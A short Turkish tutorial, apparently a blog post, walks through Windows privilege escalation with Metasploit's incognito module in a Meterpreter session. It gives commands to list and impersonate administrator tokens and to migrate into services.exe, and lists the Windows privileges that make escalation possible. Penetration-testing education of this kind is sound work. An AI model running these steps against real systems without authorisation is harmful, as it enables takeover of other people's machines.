Elde ettiğimiz oturum üzerinde yetki yükseltmeye yarayan incognito modulünden bahsedeceğim. Tokenlar aynı web cookilerine benzer. Geçici olarak bu tokenlar bizlere system ve ağlara kullanıcı adı ve şifre sunmadan her zaman erişmemize sağlar. Incognito exploit de tokenları çalar.
İki tip token vardır. Bunlar ;
Delegate tokenlar interactive’dir. Makinede oturum açmak ya da uzaktan oturum açmak gibi durumlardır.
Impersonate tokenlar non-interactive’dir. Ağ sürücüsünde ve ya domain’de oturum açmak gibi durumlardır.
Şimdi incognito modulünü meterpreter ile kullanalım
use incognito
list_tokens -g
impersonate_token BUILTIN\\Administrators
Aslında her şey iyi gözüküyor. Bir eksiğimiz daha var. Bunun için öneri gereği serivices.exe’ye migrate uygulamak.
ps Tüm processler listelenir.
migrate 668
whoami 🙂
Ek bilgiler:
whoami /privSeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeTcbPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
komut çıktısından sonra yukarıdakilerin state(durumlarında) enable görürsek yetki yükseltme yapabiliriz.(düşük yetkili kullanıcı için söylüyorum)
Daha fazla bilgi için: https://www.offensive-security.com/metasploit-unleashed/fun-incognito/